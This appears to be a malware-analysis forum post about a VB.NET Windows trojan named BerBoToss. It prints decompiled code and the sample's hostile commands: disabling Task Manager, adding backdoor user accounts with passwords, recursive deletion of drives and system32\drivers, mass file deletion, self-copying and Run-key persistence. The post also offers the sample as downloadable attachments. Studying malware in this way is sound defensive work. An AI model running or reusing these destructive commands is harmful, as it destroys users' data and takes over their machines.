Hi,
It is a Windows PE EXE file. It is written in vb.net
This Trojan performs several malicious actions, destroying and altering data with malicious intent, causing computer malfunction, displaying informative message and logout system with creating new protected user’s sessions. This malware sample has very basic infection ways and aggressive behavior to delete specific files.
Last sample 1/41 VT Scan
http://www.virustotal.com/fr/analisis/d ... 1279046904
It is a Windows PE EXE file. It is written in vb.net
This Trojan performs several malicious actions, destroying and altering data with malicious intent, causing computer malfunction, displaying informative message and logout system with creating new protected user’s sessions. This malware sample has very basic infection ways and aggressive behavior to delete specific files.
Filename: BerBoToss.exe
Language: MS Visual Basic.NET
Author according version information:
3an9oud-La3jeb Hackers
Maroc Fes City BerBoToss
Session name: 3an9oud-La3jeb
Password: 1MarocBerbotossFes
Session name: Berbotoss_L39
Password: 1MarocBerbotossFes
Session name: Fes_L39_Berbotoss
Password: 1MarocBerbotossFes
Session name: Administrateur
Password: 1marocberbotossfes <<-- "lower case"
Disable Task Manager:
.method public static void DisableTaskMgr(bool Enable)
.locals init (bool V0)
switch DisableTaskMgr_0, DisableTaskMgr_1
DisableTaskMgr_1:
call class BerBoToss.My.MyComputer BerBoToss.My.MyProject::get_Computer()
callvirt get_Registry()
ldstr "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"
ldstr "DisableTaskMgr"
ldstr "1"
callvirt SetValue
DisableTaskMgr_0:
call class BerBoToss.My.MyComputer BerBoToss.My.MyProject::get_Computer()
callvirt get_Registry()
ldstr "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\system"
ldstr "DisableTaskMgr"
callvirt SetValue
Create text files:
ldstr "C:\\wmnpdmod.dll"
ldstr "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss"
ldstr "C:\\msimg32.dll"
ldstr "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss"
ldstr "C:\\kbdhe340.dll"
ldstr "BeRboToss-BeRboToss-BeRboToss-BeRboToss-BeRboToss"
Kill process:
ldstr "firefox"
callvirt void [System]System.Diagnostics.Process::Kill()
ldstr "IEXPLORE"
callvirt void [System]System.Diagnostics.Process::Kill()
ldstr "notepad"
callvirt void [System]System.Diagnostics.Process::Kill()
ldstr "msnmsgr"
callvirt void [System]System.Diagnostics.Process::Kill()
Copy itself:
ldstr "cmd /c copy BerBoToss.exe C:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe E:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe F:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe D:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe g:\\BerBoToss.exe"
ldstr "cmd /c copy BerBoToss.exe C:\\WINDOWS\\BerBoToss.exe"
Create new user session:
ldstr "net user Administrateur /add"
ldstr "net user Fes_L39_Berbotoss /add"
ldstr "net user 3an9oud-La3jeb /add"
ldstr "net user Berbotoss_L39 /add"
ldstr "net user Fes_L39_Berbotoss 1MarocBerbotossFes"
ldstr "net user 3an9oud-La3jeb 1MarocBerbotossFes"
ldstr "net user Administrateur 1marocberbotossfes"
ldstr "net user Berbotoss_L39 1MarocBerbotossFes"
Rename hard disk label:
ldstr "label c: 3an9oud-La3jeb"
ldstr "label d: 3an9oud-La3jeb"
ldstr "label e: 3an9oud-La3jeb"
ldstr "label f: 3an9oud-La3jeb"
ldstr "label g: 3an9oud-La3jeb"
ldstr "label h: 3an9oud-La3jeb"
ldstr "label l: 3an9oud-La3jeb"
Delete NET session:
ldstr "cmd /c NET SESSION * /del"
ldstr "cmd /c NET SESSION \\poste_connect? /del"
Remove directory:
ldstr "cmd /c rd d:\\ /s/q"
ldstr "cmd /c rd e:\\ /s/q"
ldstr "cmd /c rd f:\\ /s/q"
ldstr "cmd /c rd g:\\ /s/q"
ldstr "cmd /c rd C:\\WINDOWS\\system32\\drivers /s/q"
Delete specific files:
ldstr "cmd /c del C:\\*.mp3 /s/q"
ldstr "cmd /c del C:\\*.jpg /s/q"
ldstr "cmd /c del C:\\*.zip /s/q"
ldstr "cmd /c del C:\\*.rar /s/q"
ldstr "cmd /c del C:\\*.lnk /s/q"
ldstr "cmd /c del C:\\*.3gp /s/q"
ldstr "cmd /c del C:\\*.lrc /s/q"
ldstr "cmd /c del C:\\*.html /s/q"
Set new system time:
ldstr "cmd /c Time 11:11.00"
Set new system date:
ldstr "cmd /c date 01/1/1987"
Lock workstation:
ldstr "cmd /c rundll32.exe user32.dll,LockWorkStation"
Start default Internet Explorer:
ldstr "hxxp://fassifasso.tripod.com/xxx.xxx/BerBoToss/index.html"
call class [System]System.Diagnostics.Process [System]System.Diagnostics.Process::Start(class System.String)
Set malware startup:
ldstr "cmd /c reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v BerBoToss /t REG_SZ /d C:\\WINDOWS\\BerBoToss.exe"
Clipboard:
callvirt class MyServices.ClipboardProxy Devices.Computer::get_Clipboard()
ldstr "BerBoToss V1.0"
Display message:
ldstr "BerBoToss Operation !!! Chinass Hakda Kayfahmo Chinass Hakda kayssam3o Hada Message lik Ou Lihoum _+... Daba AdiosS Amigoss"
ldstr "Maroc Fes Erreur HTTA 39 - Mardankore.dll ... & "
call value class MsgBoxResult Interaction::MsgBox(class System.Object, value class MsgBoxStyle, class System.Object)
box MsgBoxResult
Last sample 1/41 VT Scan
http://www.virustotal.com/fr/analisis/d ... 1279046904
Attachments
Pass: malware
(6 KiB) Downloaded 69 times
(6 KiB) Downloaded 69 times
pass: malware
(5.73 KiB) Downloaded 67 times
(5.73 KiB) Downloaded 67 times